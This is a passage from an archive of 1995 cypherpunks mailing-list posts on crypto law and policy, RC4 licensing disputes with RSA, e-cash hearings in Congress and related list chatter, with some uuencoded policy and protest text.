M8GD@=&AE(&9I;F%N8VEA;"!C;VUM=6YI='DN"L$""`<(!Q``P51H97)E(&AA
M<R!B965N(&%N(&]N9V]I;F<@9&5B871E(')E9V%R9&EN9R!W:&\@<VAO=6QD
M(&-O;G1R;VP@=&AE(&1E=F5L;W!M96YT#6%N9"!S=7!P;W)T(&]F('!R:79A
M=&6I<V5C=&]R(&-O;7!U=&5R('-E8W5R:71Y('-T86YD87)D<SH@('1H92!G
M;W9E<FYM96YT(&]R('1H92!P<FEV871E#7-E8W1O<BX@($%"02!S=')O;F=L
M>2!R96-O;6UE;F1S('1H870@=&AE(%4N4RX@9V]V97)N;65N="!W;W)K('=I
M=&@@=&AE('!R:79A=&4@<V5C=&]R#6%N9"!#;VYG<F5S<R!I;B!A;B!O<&5N
M(&9O<G5M('1O(&1E=F5L;W`@82!C;VUP<F5H96YS:79E('!O;&EC>2!O;B!T
M:&4@8V]M;65R8VEA;"!U<V4-;V8@8W)Y<'1O9W)A<&AY+B`*P0((!P@'$`#!
M26X@:71S(&YE=VQYJ7)E=FES960@<&]L:6-Y('-T871E;65N="!O;B!C<GEP
M=&]G<F%P:'DL($%"02!P<F]P;W-E9"!A;'1E<FYA=&EV97,@"G1O($1%4R!A
M;F0@;W5T;&EN960@;W1H97(@8W)I=&5R:6$@=&AA="!M=7-T(&)E(&UE="!B
M969O<F4@8VAA;F=E<R!I;B!C<GEP=&]G<F%P:&EC(`IS=&%N9&%R9',@8V%N
M(&)E(&%C8V5P=&5D(&)Y('1H92!B86YK:6YG(&EN9'5S=')Y+B`@(%1H97-E
M(&-R:71E<FEA(*FI('=H:6-H('=I;&P@8F4@U``<```6`2@"```````````#
M,"HP*C`JL`2P!!P``-2,T`8&```"!@`&T-0%"``L`*$2"``%U"AM;W)E*2`*
MU`4(`"\`[!,(``74T`8&``(`!@`&T-0%"``+`+`$"``%U`K4`0P```:/`%H`
MN@(,``'4PPS#04)!($-265!43T=205!(62!03TQ)0UDO4#(*U`$,```&D`!9
M`!<$#``!U,0,Q'!R97-E;G1E9"!N97AT('=E96L@=&\@<F5P<F5S96YT871I
M=F5S(&]F('1H92!7:&ET92!(;W5S92P@52Y3+B!$97!A<G1M96YT(&]F#4-O
M;6UE<F-E+"!.871I;VYA;"!396-U<FET>2!!9V5N8WD@*$Y302D@86YD(&9E
M9&5R86P@8F%N:VEN9R!A9V5N8VEE<R"IJ2!W97)E#61E=F5L;W!E9"!F;VQL
M;W=I;F<@82!T=V^I9&%Y(&UE971I;F<@:&5L9"!I;B!*=6YE(&]F(&)A;FME
M<G,L('9E;F1O<G,@86YD(&-R>7!T;PUE>'!E<G1S(&-O;F-E<FYE9"!A8F]U
M="!T:&4@9F5D97)A;"!G;W9E<FYM96YT)W,@9&ER96-T:6]N(')E9V%R9&EN
M9R!P<FEV871EJ7-E8W1O<@UI;F9O<FUA=&EO;B!S96-U<FET>2X@"L$""`<(
M!Q``P5-P96-I9FEC86QL>2P@04)!(')E8V]M;65N9&5D.@K!`@@'"`<0`,'`
M`@3`("!4:&4@9FEN86YC:6%L('-E<G9I8V5S(&EN9'5S=')Y(&)E(&%L;&]W
M960@=&\@8V]N=&EN=64@=&\@=7-E($1%4R!B87-E9"!O;B!R:7-K#<$""`<(
M!Q``P6%S<V5S<VUE;G0@*&4N9RX@=F%L=64@;V8@=&AE('1R86YS86-T:6]N
M*2!A;F0@=&AE(&)U<VEN97-S(&%P<&QI8V%T:6]N(&EN=F]L=F5D+B`*P0((
M!P@'$`#!P`($P"`@02!S96-U<FET>2!F<F%M97=O<FL@96YC;VUP87-S:6YG
M(&$@9F%M:6QY(&]F(&-O;6UE<F-I86QL>2!A=F%I;&%B;&4-P0((!P@'$`#!
M86QG;W)I=&AM<RP@:6YC;'5D:6YG($1%4RP@8F4@9&5V96QO<&5D+B`@5&AI
M<R!F<F%M97=O<FL@<VAO=6QD(&EN8VQU9&4@80W!`@@'"`<0`,%P<F]C97-S
M(&9O<B!N96=O=&EA=&5D(&%L9V]R:71H;2!S96QE8W1I;VX@8F%S960@;VX@
M=&AE(&QE=F5L(&]F(')I<VL@86YD(&]T:&5R#<$""`<(!Q``P6)U<VEN97-S
M(')E<75I<F5M96YT<RX@(`K!`@@'"`<0`,'``@3`($]P<&]S:71I;VX@=&\@
M9V]V97)N;65N="!M86YD871E9"!K97D@;6%N86=E;65N="!S>7-T96US(&9O
M<B!F:6YA;F-I86P-P0((!P@'$`#!87!P;&EC871I;VYS('=H97)E(&ME>7,@
M=V]U;&0@:&%V92!T;R!B92!S=&]R960@;W5T<VED92!T:&4@9FEN86YC:6%L
M(&EN<W1I='5T:6]N#<$""`<(!Q``P2AE+F<N(&ME>2!R96=I<W1R871I;VXO
M<W5R<F5N9&5R(&]R('1H92!M86YD871O<GD@97-C<F]W(&]F(&-R>7!T;V=R
M87!H:6,@:V5Y<RDN(`W!`@@'"`<0`,%);G-T96%D+"!B86YK<R!S:&]U;&0@
M8V]N=&EN=64@=&\@8F4@<F5S<&]N<VEB;&4@9F]R(&ME>2!M86YA9V5M96YT
M(&%N9`W!`@@'"`<0`,%C;VYT:6YU92!T;R!C;V]P97)A=&4@=VET:"!G;W9E
M<FYM96YT(&9O<B!L87<@96YF;W)C96UE;G0@<'5R<&]S97,L(&%S(')E<75I
M<F5D#<$"$2,1(U,`P6)Y(&QA=RX*(,$""`<(!Q0`P<`"!,`@17AP;W)T(&]F
M(&-R>7!T;V=R87!H>2!F;W(@9FEN86YC:6%L(&%P<&QI8V%T:6]N<R!M=7-T
M(&YO="!B92!R97-T<FEC=&5D+@K!`@@'"`<4`,'``@3`($9U;&P@<&%R=&EC
M:7!A=&EO;B!O9B!#;VYG<F5S<R!A;F0@=&AE('!R:79A=&4@<V5C=&]R(&)E
M9F]R92!E<W1A8FQI<VAI;F<@82!5+E,N#<$""`<(!Q0`P7!O;&EC>2!F;W(@
M=&AE(&-O;6UE<F-I86P@=7-E(&]F(&-R>7!T;V=R87!H>2P@:6YS=&5A9"!O
M9B!B96EN9R!C87)R:65D(&]U="!S;VQE;'D-P0((!P@'%`#!8GD@17AE8W5T
M:79E($]R9&5R+@K!`@@'"`<4`,%;3F]T93H@(%1H97-E(')E8V]M;65N9&%T
M:6]N<R!W97)E('-U;6UA<FEZ960N("!&;W(@=&AE(&9U;&P@<W1A=&5M96YT
M+"!P;&5A<V4-P0((!P@'%`#!8V%L;"!3;VYI82!"87)B87)A(&%T(#(P,B\V
M-C.I-30V.2Y="L$""`<(!Q0`P=`""`"``0`!"``"T%1H92!!;65R:6-A;B!"
M86YK97)S($%S<V]C:6%T:6]N(&ES('1H92!O;FQY(&YA=&EO;F%L('1R861E
M(&%N9"!P<F]F97-S:6]N86P-87-S;V-I871I;VX@<V5R=FEN9R!T:&4@96YT
M:7)E(&)A;FMI;F<@8V]M;75N:71Y+"!F<F]M('-M86QL(&-O;6UU;FET>2!B
M86YK<R!T;R!L87)G90UB86YK(&AO;&1I;F<@8V]M<&%N:65S+B`@04)!(&UE
M;6)E<G,@<F5P<F5S96YT(&%P<')O>&EM871E;'D@.3`@<&5R8V5N="!O9B!T
M:&4-8V]M;65R8VEA;"!B86YK:6YG(&EN9'5S=')Y)W,@=&]T86P@87-S971S
M+"!A;F0@86)O=70@.30@<&5R8V5N="!O9B!!0D$@;65M8F5R<R!A<F4-8V]M
M;75N:71Y(&)A;FMS('=I=&@@87-S971S(&QE<W,@=&AA;B`D-3`P(&UI;&QI
1;VXN"L'@1!/L$S@`P2,C(X/!
`
end





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "greg pitz" <pitz@onetouch.com>
Date: Wed, 26 Jul 95 13:48:40 PDT
To: cypherpunks@toad.com
Subject: Re: Crypto Law Survey
Message-ID: <9507262045.AA18413@onetouch.com>
MIME-Version: 1.0
Content-Type: text/plain


On Wed, 26 Jul 1995 15:28:43 Michael Froomkin wrote:

> few years.   Second, the American Bar Association Section on 
> Science and Technology's Information Security Committee is 
> drafting Guidelines and Model Legislation which, if they are 
> ever completed, will improve upon the Utah initiative.  

Would someone be so kind as to describe the Utah initiative?  I 
wasn't able to find a further description in my percursory search of 
Mr Froomkin's otherwise very informative home page

http://www-swiss.ai.mit.edu/6095/articles/froomkin-metaphor/text.html

...................
pitz@onetouch.com
greg pitz      ..





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: rross@sci.dixie.edu (Russell Ross)
Date: Wed, 26 Jul 95 12:38:46 PDT
To: Hal <hfinney@shell.portal.com>
Subject: Re: RC4
Message-ID: <v01520d01ac3c496012a1@[144.38.16.209]>
MIME-Version: 1.0
Content-Type: text/plain


>From: Alex Tang <altitude@umich.edu>
>> I talked with RSA yesterday specifically about free servers and RC4.
>> They just said that they would need a business plan for the
>> server product.  When i said that the product would be free, they started
>> talking in circles about how everyone who uses RC4 needed a license (but i
>> was asking about the licenses...)  I asked flat out "how much would a
>> license for RC4 cost for a free server product".  They only reponded with
>> "Very Expensive", and then went on about a business plan.
>
>Ask them about the free version of RC4 which is circulating.  If they say
>it is patented ask them for the patent number.  Ask them why you should
>pay them big bucks if you can get it for free.

Here's their reply to a similar correspondence:

>The RC4 algorithm is copyrighted by and intellectual property of RSA Data
>Security.  For use of this algorithm in a product or service you plan to
>sell, you may use the RC4 software implementation from our BSAFE toolkit.
>Licenses are not available for other commercial software implementations of
>this algorithm other than what is included in our BSAFE toolkit.

I wasn't aware that you could copyright an algorithm.  Patent, yes, but not
copyright.  Intellectual property meens secret, right?  Aren't there any
precendence cases involving propriety schemes that are reverse engineered?
I know there have been, I just can't remember what they are.  In any case,
RSADSI is likely to sue anyone who attempts to use the RC4 code openly, and
even if they lose there are considerable legal fees involved for whoever
tries it.  What if a bunch of people put secure HTTPd servers online at the
same time, without any clear trail pointing to the first one?  If the RC4
code really is legal to use, this would make it hard for RSADSI to pinpoint
anyone to sue, thus eliminating the intimidation factor.

By the way, since RSA is such a vocal opponent of the Clipper chip on the
grounds of its secret Skipjack algorithm, why does it market secret
algorithms like RC4 and RC2?  Does this seen like a double face to anyone
else?

-----------------------------------------------------------
Russell Ross                     email: rross@sci.dixie.edu
1260 N 1280 W                    voice: (801)628-8146
St. George, UT 84770-4953






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: mkj@october.ducktown.org
Date: Wed, 26 Jul 95 11:40:15 PDT
To: cypherpunks@toad.com
Subject: Re: NRC panel wants questions for Law Enforcement on crypto policy
Message-ID: <199507261746.NAA00249@october.ducktown.org>
MIME-Version: 1.0
Content-Type: text/plain


----- Forwarded message from David Lesher -----

>In April, gnu asked:
>> Herb Lin called today to ask if the Cypherpunks could come up with a
>> list of questions for their panel to ask the law enforcement community
>> about crypto policy.  They will be meeting with senior law enforcement
>> officials like FBI Director Freeh a week or so from now.
>
>Did we ever get any feedback on this?
>
>- -- 
>A host is a host from coast to coast.................wb8foz@nrk.com
>& no one will talk to a host that's close........[v].(301) 56-LINUX
>Unless the host (that isn't close).........................pob 1433
>is busy, hung or dead....................................20915-1433

----- End of forwarded message from David Lesher -----

I'm glad you brought that up.  Having contributed some questions myself, I
was hoping to get some kind of feedback.  I didn't expect transcripts of any
top-secret meetings or anything, but the whole subject seems to have fallen
into a black hole; we don't even know whether the meetings ever took place.

If possible, it would be great to hear at least general reactions to at
least some of the questions and issues we raised.

John, did anything ever come of this?  Do you have any info at all?

					---  mkj



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Phiberflea@aol.com
Date: Wed, 26 Jul 95 10:46:17 PDT
To: cypherpunks@toad.com
Subject: Re:  Questions about Conferences
Message-ID: <950726134606_123430063@aol.com>
MIME-Version: 1.0
Content-Type: text/plain



Joel Hames wrote:
What is Defcon?

Perry Metzger responded:
>Some hacker convention.  It doesn't have anything to do with crypto per se.

Here are just two of the topics which will be discussed:

Bruce Schneier,  Author of "Applied Cryptography".  TOPIC:  Will speak on
issues surrounding cryptography, digital authentication, digital cash.

EFF.  TOPIC:  Will cover current legal threats, privacy and computer
information networks.

I believe last year's key speak was Mr. Phil Zimmerman.  There are currently
22 speakers registered for this year's convention.

:)  See ya in Vegas.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: cjl <cjl@welchlink.welch.jhu.edu>
Date: Wed, 26 Jul 95 11:02:22 PDT
To: E.J.Koops@kub.nl
Subject: Re: Crypto Law Survey
In-Reply-To: <2769@umlaw.demon.co.uk>
Message-ID: <Pine.SOL.3.91.950726134802.10241A-100000@welchlink.welch.jhu.edu>
MIME-Version: 1.0
Content-Type: text/plain



This list might usefully be supplemented by an electronic censorship 
law review as the two issues are inextricably intertwined.  There is a news 
piece in the 20th July issue of NATURE saying that in the UK, the Lord 
Chancellor, Lord Mackay of Clashfern will be floating draft legislation 
to protect ISP's from defamation actions brought about by posts from 
their users.  Mackay's Defamation Bill does not address USENET and 
moderated discussion groups apparently.  Do our UK-centric readers have 
any more details on the proposals?

C. J. Leonard                     (    /      "DNA is groovy"
                                   \ /                - Watson & Crick
<cjl@welchlink.welch.jhu.edu>      / \     <--  major groove
                                  (    \
Finger for public key               \   )
Strong-arm for secret key             /    <--  minor groove
Thumb-screws for pass-phrase        /   )





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: rross@sci.dixie.edu (Russell Ross)
Date: Wed, 26 Jul 95 13:03:13 PDT
To: ssl-talk@netscape.com
Subject: Re: RC4
Message-ID: <v01520d05ac3c5174f88c@[144.38.16.209]>
MIME-Version: 1.0
Content-Type: text/plain


>From: Alex Tang <altitude@umich.edu>
>> I talked with RSA yesterday specifically about free servers and RC4.
>> They just said that they would need a business plan for the
>> server product.  When i said that the product would be free, they started
>> talking in circles about how everyone who uses RC4 needed a license (but i
>> was asking about the licenses...)  I asked flat out "how much would a
>> license for RC4 cost for a free server product".  They only reponded with
>> "Very Expensive", and then went on about a business plan.
>
>Ask them about the free version of RC4 which is circulating.  If they say
>it is patented ask them for the patent number.  Ask them why you should
>pay them big bucks if you can get it for free.

Here's their reply to a similar correspondence:

>The RC4 algorithm is copyrighted by and intellectual property of RSA Data
>Security.  For use of this algorithm in a product or service you plan to
>sell, you may use the RC4 software implementation from our BSAFE toolkit.
>Licenses are not available for other commercial software implementations of
>this algorithm other than what is included in our BSAFE toolkit.

I wasn't aware that you could copyright an algorithm.  Patent, yes, but not
copyright.  Intellectual property meens secret, right?  Aren't there any
precendence cases involving propriety schemes that are reverse engineered?
I know there have been, I just can't remember what they are.  In any case,
RSADSI is likely to sue anyone who attempts to use the RC4 code openly, and
even if they lose there are considerable legal fees involved for whoever
tries it.  What if a bunch of people put secure HTTPd servers online at the
same time, without any clear trail pointing to the first one?  If the RC4
code really is legal to use, this would make it hard for RSADSI to pinpoint
anyone to sue, thus eliminating the intimidation factor.

By the way, since RSA is such a vocal opponent of the Clipper chip on the
grounds of its secret Skipjack algorithm, why does it market secret
algorithms like RC4 and RC2?  Does this seen like a double face to anyone
else?

-----------------------------------------------------------
Russell Ross                     email: rross@sci.dixie.edu
1260 N 1280 W                    voice: (801)628-8146
St. George, UT 84770-4953






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jason Weisberger <jweis@primenet.com>
Date: Wed, 26 Jul 95 14:11:57 PDT
To: rross@sci.dixie.edu (Russell Ross)
Subject: Re: RC4
In-Reply-To: <v01520d05ac3c5174f88c@[144.38.16.209]>
Message-ID: <199507262111.OAA14809@usr2.primenet.com>
MIME-Version: 1.0
Content-Type: text


> >The RC4 algorithm is copyrighted by and intellectual property of RSA Data
> >Security.  For use of this algorithm in a product or service you plan to
> >sell, you may use the RC4 software implementation from our BSAFE toolkit.
> >Licenses are not available for other commercial software implementations of
> >this algorithm other than what is included in our BSAFE toolkit.
> 
> I wasn't aware that you could copyright an algorithm.  Patent, yes, but not
> copyright.  Intellectual property meens secret, right?  Aren't there any
> precendence cases involving propriety schemes that are reverse engineered?
> I know there have been, I just can't remember what they are.  In any case,
> RSADSI is likely to sue anyone who attempts to use the RC4 code openly, and
> even if they lose there are considerable legal fees involved for whoever
> tries it.  What if a bunch of people put secure HTTPd servers online at the
> same time, without any clear trail pointing to the first one?  If the RC4
> code really is legal to use, this would make it hard for RSADSI to pinpoint
> anyone to sue, thus eliminating the intimidation factor.

RSA wants money (this comes from speaking with an RSA sales guy - Dave 
Garifolio, who incidentially sends out really neat RSA folders full of 
info you can take out of the folder and put elsewhere leaving you a cool 
folder) for the toolkit, thats all.  They send you to some sister corp of 
theirs and then charge you for the license.  Dave tells me there might be 
a chance you could buy one kit from RSA, design the server and anyone who 
wanted to use it could pay something like a $300.00 fee to lic. the thing.

However, in the aformentioned folder, Dave sent me all kinds of "we want 
big cash" paperwork, which I have yet to read (as anything you've gotta 
put in a really cool folder to get me to read can't be worth the time out 
from sleeping.)


> 
> By the way, since RSA is such a vocal opponent of the Clipper chip on the
> grounds of its secret Skipjack algorithm, why does it market secret
> algorithms like RC4 and RC2?  Does this seen like a double face to anyone
> else?
> 

Uh, yeah.

Jason Weisberger
jweis@primenet.com 
http://198.147.97.19/~jweis



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: rah@shipwright.com (Robert Hettinga)
Date: Wed, 26 Jul 95 11:31:48 PDT
To: cypherpunks@toad.com
Subject: Re: AP: Load Cash, Cruise Virtual Mall
Message-ID: <v02120d00ac3c39693750@[199.0.65.105]>
MIME-Version: 1.0
Content-Type: text/plain


Or so we thought until my emailer urped:

>>electronic From: listproc@mcfeeley.cc.utexas.edu
>>Date: Sat, 20 May 1995 07:09:01 -0500
>>Reply-To: listproc@mcfeeley.cc.utexas.edu
>>Sender: listproc@mcfeeley.cc.utexas.edu
>>To: rah@shipwright.com
>>Cc: grgcombs@mail.utexas.edu
>>Subject: SUBSCRIBE MCIP ROBERT HETTINGA
>>X-Comment: Unix List Processor, version 6.0c/940712/0
>>
>>You have been added to list mcip@mcfeeley.cc.utexas.edu.
>>The system has recorded your address as
>>
>>                        rah@shipwright.com
>>
>>and in order for your messages to get posted (if the list accepts postings),
>>you will have to send them from this address, unless the list does not require
>>subscription for posting.

Well, you get the point.

My apologies. Maybe I should do my mail in Netscape instead...

;-)

Now I suppose it's time to change my mcip password, eh?

Feh.

Cheers,
Bob Hettinga

-----------------
Robert Hettinga (rah@shipwright.com)
Shipwright Development Corporation, 44 Farquhar Street, Boston, MA 02131
USA (617) 323-7923
"Reality is not optional." --Thomas Sowell
>>>>Phree Phil: Email: zldf@clark.net  http://www.netresponse.com/zldf <<<<<






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: rah@shipwright.com (Robert Hettinga)
Date: Wed, 26 Jul 95 11:35:13 PDT
To: cypherpunks@toad.com
Subject: AP: Load Cash, Cruise Virtual Mall
Message-ID: <v02120d01ac3c3af19368@[199.0.65.105]>
MIME-Version: 1.0
Content-Type: text/plain



Ahem. One more time...

>WASHINGTON (AP)  A day in the financial life of a future consumer may
>begin something like this: Wake up, log in, download some e-cash into
>your PC's hard drive, then go cruise the virtual mall.
>
>It's on the verge of happening, experts told Congress on Tuesday. But
>some caution that, without planning and coordination, the brave new
>Internet world of a cashless, checkless society could turn into an
>electronic "Tower of Babel."
>
>"On the Internet ... it is difficult to tell if a transaction has taken
>place since there is no central authority to track and report it," said
>David M. Van Lear, chief executive of Electronic Payment Services Inc.,
>a 2 1/2-year-old joint venture of four banks.
>
>"There are currently no standard operating regulations," he said. "In
>addition, there is no central authority to track and report on criminal
>activity, including counterfeiting and money laundering."
>
>It was all a bit mind-boggling for members of the House Banking monetary
> policy subcommittee, whose chairman, Rep. Michael Castle, R-Del.,
>observed, "Some of us can barely read our e-mail."
>
>But, more than 25,000 merchants in 150 countries are already on the
>Internet, selling or advertising products and services to 20 million
>users, a figure that will grow to 100 million within five years,
>according to MasterCard International.
>
>So, Castle said, "it is time for lawmakers to start grappling with the
>implications of an entirely new monetary system in cyberspace, one that
> transcends national governments and national boundaries."
>
>For instance, how will the Federal Reserve Board measure the amount and
>velocity of money flowing through the Internet? How will the Internal
>Revenue Service audit transactions conducted anonymously without paper
>records? What laws apply when a U.S. consumer orders a product from a
>business overseas and the goods never arrive?
>
>The lawmakers received seemingly conflicting advice from a panel of
>experts that included Van Lear, executives from MasterCard and Visa
>U.S.A. and Scott Cook, the chairman of the personal finance software
>company, Intuit Inc.
>
>They were told that government will be crucial to fostering stability of
> the new electronic monetary system and public trust in it but that
>premature or too much regulation could stifle innovation.
>
>The new technology, the experts said, will both open new avenues for
>fraud and offer new protections and safeguards.
>
>The system, some said, needs to be fully auditable so tax and criminal
>authorities can reconstruct a series of transactions but it also should
>protect Americans privacy.
>
>For instance, David Chaum, the pony-tailed chairman of DigiCash Inc.,
>said his version of electronic cash, or e-cash, would provide the same
>privacy protection and anonymity in small transactions as traditional
>cash.
>
>Using encrypted codes and special software that offer much more security
> than the current unprotected transfer of credit card information via
>the Internet, consumers could download cash into the hard drive of their
> personal computers.
>
>They'd spend it by transferring it to merchants via computer. Or they
>could store the cash on "smart cards" equipped with a computer chip
>capable of storing far more information than the magnetic strips now on
>credit and debit cards.
>
>The cards then would function like pocket money and could be used in
>vending machines, parking meters and subway turnstiles equipped to
>receive them.
>
>MasterCard International and Visa are developing similar smart cards
>but, unlike Chaum's, theirs would generate an audit trail that could
>help law enforcement officials combatting tax evasion, counterfeiting
>and money laundering.
>
>Rosalind L. Fisher, executive vice president of Visa, a consortium of
>financial institutions, urged Congress to maintain public confidence in
>new forms of electronic payment by allowing them to be offered only
>through institutions to supervision by banking regulators.
>
>At the same time, she said, we are concerned that additional regulation
> in this area will "stifle innovations ... subjecting many of these
>products to ... premature death."
>
>By way of example, she cited a Federal Reserve regulation that, if
>applied, could require machines accepting smart cards to issue paper
>receipts, ruining the economic viability of the cards for such small
>purchases as a 75-cent soda.
>
>Castle, who plans at least one more hearing on the future of money this
>fall, agreed that Congress should hold off on legislating for now but
>should be prepared to move quickly if problems develop.
>
>"I dont think we need regulations now, but we had better be ready to
>respond ... if some guy can crack a code and create a million-dollar
>account, transfer it around a couple times and end up in the Bahamas,"
>he said.
>

-----------------
Robert Hettinga (rah@shipwright.com)
Shipwright Development Corporation, 44 Farquhar Street, Boston, MA 02131
USA (617) 323-7923
"Reality is not optional." --Thomas Sowell
>>>>Phree Phil: Email: zldf@clark.net  http://www.netresponse.com/zldf <<<<<






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Michael@umlaw.demon.co.uk (Michael Froomkin)
Date: Wed, 26 Jul 95 09:30:56 PDT
To: E.J.Koops@kub.nl
Subject: Re: Crypto Law Survey
Message-ID: <2769@umlaw.demon.co.uk>
MIME-Version: 1.0
Content-Type: text/plain


Thank you for your useful survey.  May I make two comments about 
the US section?  First, many lawyers believe the ITAR to be 
unconstitutional as applied to some or all cryptographic 
algorithims and software; a court test is likely within the next 
few years.   Second, the American Bar Association Section on 
Science and Technology's Information Security Committee is 
drafting Guidelines and Model Legislation which, if they are 
ever completed, will improve upon the Utah initiative.  
Meanwhile, other states, including California, are considering 
bills that are similar to Utah's.
-- 
Michael Froomkin                   until Aug 6: michael@umlaw.demon.co.uk
U.Miami School of Law                                     London, England
mfroomki@umiami.ir.miami.edu <-- this will still find me
PO Box 248087 Coral Gables, FL 33124-8087 "Rain in parts, then dry" --BBC
See http://www-swiss.ai.mit.edu/6095/articles/froomkin-metaphor/text.html




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Perry E. Metzger" <perry@imsi.com>
Date: Wed, 26 Jul 95 12:51:18 PDT
To: rross@sci.dixie.edu (Russell Ross)
Subject: Re: RC4
In-Reply-To: <v01520d01ac3c496012a1@[144.38.16.209]>
Message-ID: <9507261950.AA28199@snark.imsi.com>
MIME-Version: 1.0
Content-Type: text/plain



Russell Ross writes:
> In any case,
> RSADSI is likely to sue anyone who attempts to use the RC4 code openly, and
> even if they lose there are considerable legal fees involved for whoever
> tries it.

I'll just have to put it into my IPSP implementation, then. I am more
than willing to pay a few tens of thousands to lawyers for this
particular purpose. I will produce a text description of the algorithm
and have an intern re-implement it from scratch just to make sure --
I'll probably prepare some notarized documents attesting to the
development methodology, too.  It will be fun to see if Jim Bidzos
actually tries to pull something under those circumstances.

Perry




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Perry E. Metzger" <perry@imsi.com>
Date: Wed, 26 Jul 95 12:52:52 PDT
To: stewarts@ix.netcom.com (Bill Stewart)
Subject: Re: Challenge-response passwords (Was: big word listing)
In-Reply-To: <199507261944.MAA20832@ix9.ix.netcom.com>
Message-ID: <9507261952.AA28574@snark.imsi.com>
MIME-Version: 1.0
Content-Type: text/plain



Bill Stewart writes:
> It's _not_ free after 1997!  I thought of it last fall, was
> surprised I couldn't find it anywhere in the literature, given that
> it's pretty obvious, but eventually found that a guy from Siemens
> had patented it in Germany and then gotten a US patent in ~1994.
> Unfortunately, he phrased it in terms of
> "commutative hash functions", with g^X mod p as an example, so it's more
> general.

Given all the prior art, I have a solid suspicion that the patent
wouldn't hold up. The existance of the publically published Diffie
Hellman patent, for instance, makes it rather hard to patent the
more general case.

Perry




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: stewarts@ix.netcom.com (Bill Stewart)
Date: Wed, 26 Jul 95 15:53:19 PDT
To: strick at Jihad <strick@yak.net>
Subject: Hey, you're back?
Message-ID: <199507262250.PAA00754@ix4.ix.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


Hi, Strick, I see you're back on the list - how was Europe?
Are you back out west, or just dialing in from somewhere?
                Bill
#---
#                                Thanks;  Bill
# Bill Stewart, Freelance Information Architect, stewarts@ix.netcom.com
# Phone +1-510-247-0664 Pager/Voicemail 1-408-787-1281
#---
# Export PGP three lines a time --> http://dcs.ex.ac.uk/~aba/export/
M0V]N9W)E<W,@<VAA;&P@;6%K92!N;R!L87<@+BXN(&%B<FED9VEN9R!T:&4@
M9G)E961O;2!O9B!S<&5E8V@L(&]R(&]F('1H92!P<F5S<SL-"F]R('1H92!R
M:6=H="!O9B!T:&4@<&5O<&QE('!E86-E86)L>2!T;R!A<W-E;6)L92P@( T*





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jon Lasser <jlasser@rwd.goucher.edu>
Date: Wed, 26 Jul 95 13:12:51 PDT
To: Russell Ross <rross@sci.dixie.edu>
Subject: Re: RC4
In-Reply-To: <v01520d01ac3c496012a1@[144.38.16.209]>
Message-ID: <Pine.SUN.3.91.950726160640.3857A-100000@rwd.goucher.edu>
MIME-Version: 1.0
Content-Type: text/plain


On Wed, 26 Jul 1995, Russell Ross wrote:

> I wasn't aware that you could copyright an algorithm.  Patent, yes, but not
> copyright.  Intellectual property meens secret, right?  Aren't there any
> precendence cases involving propriety schemes that are reverse engineered?
> I know there have been, I just can't remember what they are. 

There was one a few years back with a special chip in Nintendo cartridges 
that you needed to buy from them... it was against a company called Atari 
(no, not THAT atari (i think)), and was decided in Atari's favor.

Hope that helps...
Jon
------------------------------------------------------------------------------
Jon Lasser                <jlasser@rwd.goucher.edu>            (410) 494-3253 
          Visit my home page at http://www.goucher.edu/~jlasser/
  You have a friend at the NSA: Big Brother is watching. Finger for PGP key.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Alex Tang <altitude@umich.edu>
Date: Wed, 26 Jul 95 13:35:11 PDT
To: rross@sci.dixie.edu (Russell Ross)
Subject: Re: RC4
In-Reply-To: <v01520d05ac3c5174f88c@[144.38.16.209]>
Message-ID: <199507262034.QAA18609@petrified.cic.net>
MIME-Version: 1.0
Content-Type: text/plain


On Wed Jul 26 16:09:38 1995: you scribbled...
> 
> >Ask them about the free version of RC4 which is circulating.  If they say
> >it is patented ask them for the patent number.  Ask them why you should
> >pay them big bucks if you can get it for free.
> 
> Here's their reply to a similar correspondence:
> 
> >The RC4 algorithm is copyrighted by and intellectual property of RSA Data
> >Security.  For use of this algorithm in a product or service you plan to
> >sell, you may use the RC4 software implementation from our BSAFE toolkit.
> >Licenses are not available for other commercial software implementations of
> >this algorithm other than what is included in our BSAFE toolkit.
> 
> I wasn't aware that you could copyright an algorithm.  Patent, yes, but not
> copyright.  Intellectual property meens secret, right?  Aren't there any
> precendence cases involving propriety schemes that are reverse engineered?
> I know there have been, I just can't remember what they are.  In any case,
> RSADSI is likely to sue anyone who attempts to use the RC4 code openly, and
> even if they lose there are considerable legal fees involved for whoever
> tries it.  What if a bunch of people put secure HTTPd servers online at the
> same time, without any clear trail pointing to the first one?  If the RC4
> code really is legal to use, this would make it hard for RSADSI to pinpoint
> anyone to sue, thus eliminating the intimidation factor.

So, does anyone know for certain if this is the true letter of the law?
Since RC4 has been reverse engineered (or leaked) to the public, do they
have any claim on it if there is no patent?  Seeing the legal web that
surrounds a lot of the current crypto situation in the US, it's not
surprising that RSA would try to smoke screen everyone into thinking that
there would be a clear violation (prosecutable by law) if anyone used RC4
without getting a license.  (It's also not surprising that no one's tried
as well...)

...alex... 

     Alex Tang  altitude@cic.net   http://petrified.cic.net/~altitude
   CICNet: Unix Support / InfoSystems Services / WebMaster / Programmer
       Viz-It!: Software Developer (Check out http://vizit.cic.net)
  UM-ITD: TaX.500 Developer (Check out http://petrified.cic.net/tax500)



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: sdw@lig.net (Stephen D. Williams)
Date: Wed, 26 Jul 95 13:51:45 PDT
To: jlasser@rwd.goucher.edu (Jon Lasser)
Subject: Re: RC4
In-Reply-To: <Pine.SUN.3.91.950726160640.3857A-100000@rwd.goucher.edu>
Message-ID: <m0sbDPf-0009tGC@sdwsys>
MIME-Version: 1.0
